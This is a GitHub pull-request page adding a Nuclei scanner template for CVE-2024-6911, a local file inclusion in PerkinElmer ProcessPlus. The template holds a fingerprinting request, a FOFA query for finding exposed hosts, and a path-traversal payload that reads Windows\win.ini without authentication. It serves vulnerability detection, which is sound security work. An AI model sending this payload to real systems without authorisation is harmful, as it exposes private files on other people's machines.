Merge pull request #10586 from Kazgangap/CVE-2024-6911

add CVE-2024-6911
patch-11
Ritik Chaddha 2024-08-29 07:52:15 +04:00 committed by GitHub
commit b9773efb81
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 56 additions and 0 deletions

View File

@ -0,0 +1,56 @@
id: CVE-2024-6911
info:
name: PerkinElmer ProcessPlus <= 1.11.6507.0 - Local File Inclusion
author: s4e-io
severity: high
description: |
Files on the Windows system are accessible without authentication to external parties due to a local file inclusion in PerkinElmer ProcessPlus.This issue affects ProcessPlus through 1.11.6507.0.
reference:
- http://seclists.org/fulldisclosure/2024/Jul/13
- https://cyberdanube.com/en/en-multiple-vulnerabilities-in-perten-processplus/
- https://nvd.nist.gov/vuln/detail/CVE-2024-6911
- https://github.com/adminlove520/pocWiki
classification:
cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
cvss-score: 8.7
cve-id: CVE-2024-6911
cwe-id: CWE-552
epss-score: 0.00043
epss-percentile: 0.09524
cpe: cpe:2.3:a:perkinelmer:processplus:1.11.6507:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: perkinelmer
product: processplus
fofa-query: '"Process Plus" && icon_hash="1772087922"'
tags: cve,cve2024,processplus,intrusive,lfi,seclists
flow: http(1) && http(2)
http:
- raw:
- |
GET /ProcessPlus HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body,"<title>Process Plus - Perten Instruments</title>")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
GET /ProcessPlus/Log/Download/?filename=..\..\..\..\..\..\Windows\win.ini HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(body,"bit app support","fonts","extensions")'
- 'contains(content_type, "text/plain")'
- 'status_code == 200'
condition: and